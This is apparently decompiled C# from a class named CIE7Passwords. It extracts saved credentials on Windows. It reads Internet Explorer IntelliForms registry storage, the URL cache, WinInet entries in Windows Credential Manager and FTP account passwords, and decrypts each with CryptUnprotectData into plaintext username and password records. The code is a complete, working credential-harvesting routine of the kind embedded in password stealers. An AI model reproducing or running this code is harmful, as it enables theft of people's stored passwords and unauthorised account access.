// Token: 0x0600010E RID: 270 RVA: 0x00002F24 File Offset: 0x00001124 private void AddPasswdInfo(string strRess, int hKey) { strRess = Strings.LCase(strRess); byte[] bytes = Encoding.Unicode.GetBytes(strRess); string text = this.GetSHA1Hash(ref bytes); text += Strings.Right("00" + Conversion.Hex(this.CheckSum(ref text)), 2); int num2; int num3; int num = CIE7Passwords.RegQueryValueEx(hKey, ref text, 0, ref num2, IntPtr.Zero, ref num3); if (num3 > 0) { IntPtr intPtr = Marshal.AllocHGlobal(num3); num = CIE7Passwords.RegQueryValueEx(hKey, ref text, 0, ref num2, intPtr, ref num3); CIE7Passwords.DATA_BLOB data_BLOB; data_BLOB.cbData = num3; data_BLOB.pbData = intPtr; CIE7Passwords.DATA_BLOB data_BLOB2; data_BLOB2.cbData = checked (Strings.Len(strRess) * 2 + 2); data_BLOB2.pbData = Marshal.StringToHGlobalUni(strRess); CIE7Passwords.DATA_BLOB dataOut; CIE7Passwords.CryptUnprotectData(ref data_BLOB, IntPtr.Zero, ref data_BLOB2, IntPtr.Zero, IntPtr.Zero, 0, ref dataOut); this.ProcessIEPass(strRess, text, dataOut); Marshal.FreeHGlobal(data_BLOB2.pbData); CIE7Passwords.LocalFree(dataOut.pbData); } }
// Token: 0x0600010F RID: 271 RVA: 0x00003018 File Offset: 0x00001218 public void Delete(string szResourceName) { int hKey = -2147483647; string text = "Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2"; int hKey2; CIE7Passwords.RegOpenKeyEx(hKey, ref text, 0, 131078, ref hKey2); int num = CIE7Passwords.RegDeleteValue(hKey2, ref szResourceName); CIE7Passwords.RegCloseKey(hKey2); CIE7Passwords.CredDelete(szResourceName, 1, 0); }
// Token: 0x06000110 RID: 272 RVA: 0x0000305C File Offset: 0x0000125C public void Refresh() { Regex regex = new Regex("name=\"([^\"]+)\"", RegexOptions.Compiled); this.m_IEPass.Clear(); int hKey = -2147483647; string text = "Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage1"; int num; CIE7Passwords.RegOpenKeyEx(hKey, ref text, 0, 131097, ref num); int hKey2 = -2147483647; text = "Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2"; int num2; CIE7Passwords.RegOpenKeyEx(hKey2, ref text, 0, 131097, ref num2); checked { if (num2 != 0 || num != 0) { text = null; int num4; int num3 = CIE7Passwords.FindFirstUrlCacheEntry(ref text, IntPtr.Zero, ref num4); if (num4 > 0) { IntPtr intPtr = Marshal.AllocHGlobal(num4); Marshal.WriteInt32(intPtr, num4); text = null; num3 = CIE7Passwords.FindFirstUrlCacheEntry(ref text, intPtr, ref num4); do { CIE7Passwords.INTERNET_CACHE_ENTRY_INFO internet_CACHE_ENTRY_INFO; object obj = Marshal.PtrToStructure(intPtr, internet_CACHE_ENTRY_INFO.GetType()); CIE7Passwords.INTERNET_CACHE_ENTRY_INFO internet_CACHE_ENTRY_INFO2; internet_CACHE_ENTRY_INFO = ((obj != null) ? ((CIE7Passwords.INTERNET_CACHE_ENTRY_INFO)obj) : internet_CACHE_ENTRY_INFO2); if ((internet_CACHE_ENTRY_INFO.CacheEntryType & 2097153) != 0) { string text2 = this.GetStrFromPtrA(internet_CACHE_ENTRY_INFO.lpszSourceUrlName); if (text2.IndexOf("?") >= 0) { text2 = text2.Substring(0, text2.IndexOf("?")); } if (Strings.InStr(text2, "@", CompareMethod.Binary) > 0) { text2 = Strings.Mid(text2, Strings.InStr(text2, "@", CompareMethod.Binary) + 1); } if (num != 0 && (internet_CACHE_ENTRY_INFO.CacheEntryType & 1) == 1) { string strFromPtrA = this.GetStrFromPtrA(internet_CACHE_ENTRY_INFO.lpHeaderInfo); string strFromPtrA2 = this.GetStrFromPtrA(internet_CACHE_ENTRY_INFO.lpszLocalFileName); if (string.IsNullOrEmpty(strFromPtrA) || !strFromPtrA.Contains("text/html")) { if (string.IsNullOrEmpty(strFromPtrA2)) { goto IL_1F3; } } try { try { foreach (object obj2 in regex.Matches(File.ReadAllText(strFromPtrA2))) { Match match = (Match)obj2; this.AddPasswdInfo(match.Groups[1].Value, num); } } finally { IEnumerator enumerator; if (enumerator is IDisposable) { (enumerator as IDisposable).Dispose(); } } } catch (Exception ex) { } } IL_1F3: this.AddPasswdInfo(text2, num); this.AddPasswdInfo(text2, num2); } num4 = 0; CIE7Passwords.FindNextUrlCacheEntry(num3, IntPtr.Zero, ref num4); Marshal.FreeHGlobal(intPtr); if (num4 > 0) { intPtr = Marshal.AllocHGlobal(num4); Marshal.WriteInt32(intPtr, num4); } }while (CIE7Passwords.FindNextUrlCacheEntry(num3, intPtr, ref num4) != 0); CIE7Passwords.FindCloseUrlCache(num3); } CIE7Passwords.RegCloseKey(num); CIE7Passwords.RegCloseKey(num2); } string lpszFilter = "Microsoft_WinInet_*"; int num5; int num6; CIE7Passwords.CredEnumerate(lpszFilter, 0, ref num5, ref num6); short[] array = new short[37]; CIE7Passwords.DATA_BLOB data_BLOB; CIE7Passwords.DATA_BLOB data_BLOB2; CIE7Passwords.DATA_BLOB data_BLOB3; if (num5 > 0) { int num7 = 0; int num8 = num5 - 1; for (int i = num7; i <= num8; i++) { IntPtr ptr = new IntPtr(num6 + i * 4); IntPtr intPtr = Marshal.ReadIntPtr(ptr); CIE7Passwords.CREDENTIAL credential; object obj3 = Marshal.PtrToStructure(intPtr, credential.GetType()); CIE7Passwords.CREDENTIAL credential2; credential = ((obj3 != null) ? ((CIE7Passwords.CREDENTIAL)obj3) : credential2); string text3 = this.CopyString(credential.lpstrTargetName); data_BLOB.cbData = 74; intPtr = Marshal.AllocHGlobal(74); string str = "abe2869f-9b47-4cd9-a358-c22904dba7f7\0"; int num9 = 0; do { Marshal.WriteInt16(intPtr, num9 * 2, (short)(Strings.Asc(Strings.Mid(str, num9 + 1, 1)) * 4)); num9++; }while (num9 <= 36); data_BLOB.pbData = intPtr; data_BLOB2.pbData = credential.lpbCredentialBlob; data_BLOB2.cbData = credential.dwCredentialBlobSize; data_BLOB3.cbData = 0; data_BLOB3.pbData = IntPtr.Zero; CIE7Passwords.CryptUnprotectData(ref data_BLOB2, IntPtr.Zero, ref data_BLOB, IntPtr.Zero, IntPtr.Zero, 0, ref data_BLOB3); Marshal.FreeHGlobal(intPtr); string expression = Marshal.PtrToStringUni(data_BLOB3.pbData); string[] array2 = Strings.Split(expression, ":", -1, CompareMethod.Binary); int num10 = Strings.InStr(Strings.Mid(text3, 19), "/", CompareMethod.Binary); if (num10 > 0) { this.m_IEPass.Add(new CIE7Password(text3, Strings.Mid(text3, 19, num10 - 1), array2[0], array2[1], DateTime.MinValue, 2, Strings.Mid(text3, 19 + num10))); } else { this.m_IEPass.Add(new CIE7Password(text3, Strings.Mid(text3, 19), array2[0], array2[1], DateTime.MinValue, 2, string.Empty)); } CIE7Passwords.LocalFree(data_BLOB3.pbData); } } CIE7Passwords.CredFree(num6); RegistryKey registryKey = Registry.CurrentUser.OpenSubKey("Software\\Microsoft\\FTP\\Accounts"); if (registryKey != null) { foreach (string text4 in registryKey.GetSubKeyNames()) { RegistryKey registryKey2 = registryKey.OpenSubKey(text4); foreach (string text5 in registryKey2.GetSubKeyNames()) { RegistryKey registryKey3 = registryKey2.OpenSubKey(text5); byte[] array3 = (byte[])registryKey3.GetValue("Password"); byte[] array4 = new byte[4]; int num11 = 0; int num12 = text4.Length - 1; for (int l = num11; l <= num12; l++) { byte b = (byte)(text4[l] & '\u001f'); array4[l & 3] = unchecked (array4[l & 3] + b); } data_BLOB2.cbData = array3.Length; data_BLOB2.pbData = Marshal.AllocHGlobal(array3.Length); Marshal.Copy(array3, 0, data_BLOB2.pbData, array3.Length); data_BLOB3.cbData = 0; data_BLOB3.pbData = IntPtr.Zero; GCHandle gchandle = GCHandle.Alloc(array4, GCHandleType.Pinned); data_BLOB.pbData = gchandle.AddrOfPinnedObject(); data_BLOB.cbData = 4; CIE7Passwords.CryptUnprotectData(ref data_BLOB2, IntPtr.Zero, ref data_BLOB, IntPtr.Zero, IntPtr.Zero, 0, ref data_BLOB3); gchandle.Free(); this.m_IEPass.Add(new CIE7Password(text4, string.Format("ftp://{0}@{1}/", text4, text5), text5, Marshal.PtrToStringUni(data_BLOB3.pbData), DateTime.MinValue, 3, string.Empty)); CIE7Passwords.LocalFree(data_BLOB3.pbData); } } } } }
// Token: 0x0600010D RID: 269 RVA: 0x00002B68 File Offset: 0x00000D68 private void ProcessIEPass(string strURL, string strHash, CIE7Passwords.DATA_BLOB dataOut) { CIE7Passwords.StringIndexEntry stringIndexEntry; int num = Strings.Len(stringIndexEntry); CIE7Passwords.StringIndexHeader stringIndexHeader; int num2 = Strings.Len(stringIndexHeader); checked { IntPtr ptr = new IntPtr(dataOut.pbData.ToInt64() + (long)(unchecked ((ulong)Marshal.ReadByte(dataOut.pbData)))); object obj = Marshal.PtrToStructure(ptr, stringIndexHeader.GetType()); CIE7Passwords.StringIndexHeader stringIndexHeader2; stringIndexHeader = ((obj != null) ? ((CIE7Passwords.StringIndexHeader)obj) : stringIndexHeader2); if (stringIndexHeader.dwType == 1) { if (stringIndexHeader.dwEntriesCount >= 2) { IntPtr intPtr = new IntPtr(ptr.ToInt32() + stringIndexHeader.dwStructSize); IntPtr value = new IntPtr(intPtr.ToInt32() + stringIndexHeader.dwEntriesCount * num); int num3 = 0; int num4 = stringIndexHeader.dwEntriesCount - 1; for (int i = num3; i <= num4; i += 2) { if (value == IntPtr.Zero | intPtr == IntPtr.Zero) { break; } object obj2 = Marshal.PtrToStructure(intPtr, stringIndexEntry.GetType()); CIE7Passwords.StringIndexEntry stringIndexEntry2; stringIndexEntry = ((obj2 != null) ? ((CIE7Passwords.StringIndexEntry)obj2) : stringIndexEntry2); IntPtr intPtr2 = new IntPtr(value.ToInt32() + stringIndexEntry.dwDataOffset); IntPtr intPtr3; string szUserName; if (CIE7Passwords.lstrlenA(intPtr2) != stringIndexEntry.dwDataSize) { intPtr3 = new IntPtr(value.ToInt32() + stringIndexEntry.dwDataOffset); szUserName = Marshal.PtrToStringUni(intPtr3); } else { intPtr3 = new IntPtr(value.ToInt32() + stringIndexEntry.dwDataOffset); szUserName = Marshal.PtrToStringAnsi(intPtr3); } intPtr = new IntPtr(intPtr.ToInt32() + num); object obj3 = Marshal.PtrToStructure(intPtr, stringIndexEntry.GetType()); stringIndexEntry = ((obj3 != null) ? ((CIE7Passwords.StringIndexEntry)obj3) : stringIndexEntry2); string szPasswd = Strings.Space(stringIndexEntry.dwDataSize); intPtr3 = new IntPtr(value.ToInt32() + stringIndexEntry.dwDataOffset); if (CIE7Passwords.lstrlenA(intPtr3) != stringIndexEntry.dwDataSize) { intPtr2 = new IntPtr(value.ToInt32() + stringIndexEntry.dwDataOffset); szPasswd = Marshal.PtrToStringUni(intPtr2); } else { intPtr3 = new IntPtr(value.ToInt32() + stringIndexEntry.dwDataOffset); szPasswd = Marshal.PtrToStringAnsi(intPtr3); } intPtr = new IntPtr(intPtr.ToInt32() + num); this.m_IEPass.Add(new CIE7Password(strHash, strURL, szUserName, szPasswd, this.FileTimeToDate(ref stringIndexEntry.ftInsertDateTime), 1, string.Empty)); } } } else if (stringIndexHeader.dwType == 0) { IntPtr intPtr = new IntPtr(ptr.ToInt32() + stringIndexHeader.dwStructSize); IntPtr value = new IntPtr(intPtr.ToInt32() + stringIndexHeader.dwEntriesCount * num); if (!(value == IntPtr.Zero | intPtr == IntPtr.Zero)) { int num5 = 0; int num6 = stringIndexHeader.dwEntriesCount - 1; for (int j = num5; j <= num6; j++) { object obj4 = Marshal.PtrToStructure(intPtr, stringIndexEntry.GetType()); CIE7Passwords.StringIndexEntry stringIndexEntry2; stringIndexEntry = ((obj4 != null) ? ((CIE7Passwords.StringIndexEntry)obj4) : stringIndexEntry2); string szUserName = Strings.Space(stringIndexEntry.dwDataSize); IntPtr intPtr3 = new IntPtr(value.ToInt32() + stringIndexEntry.dwDataOffset); if (CIE7Passwords.lstrlenA(intPtr3) != stringIndexEntry.dwDataSize) { IntPtr intPtr2 = new IntPtr(value.ToInt32() + stringIndexEntry.dwDataOffset); szUserName = Marshal.PtrToStringUni(intPtr2); } else { intPtr3 = new IntPtr(value.ToInt32() + stringIndexEntry.dwDataOffset); szUserName = Marshal.PtrToStringAnsi(intPtr3); } intPtr = new IntPtr(intPtr.ToInt32() + num); this.m_IEPass.Add(new CIE7Password(strHash, strURL, szUserName, string.Empty, this.FileTimeToDate(ref stringIndexEntry.ftInsertDateTime), 0, string.Empty)); } } } } }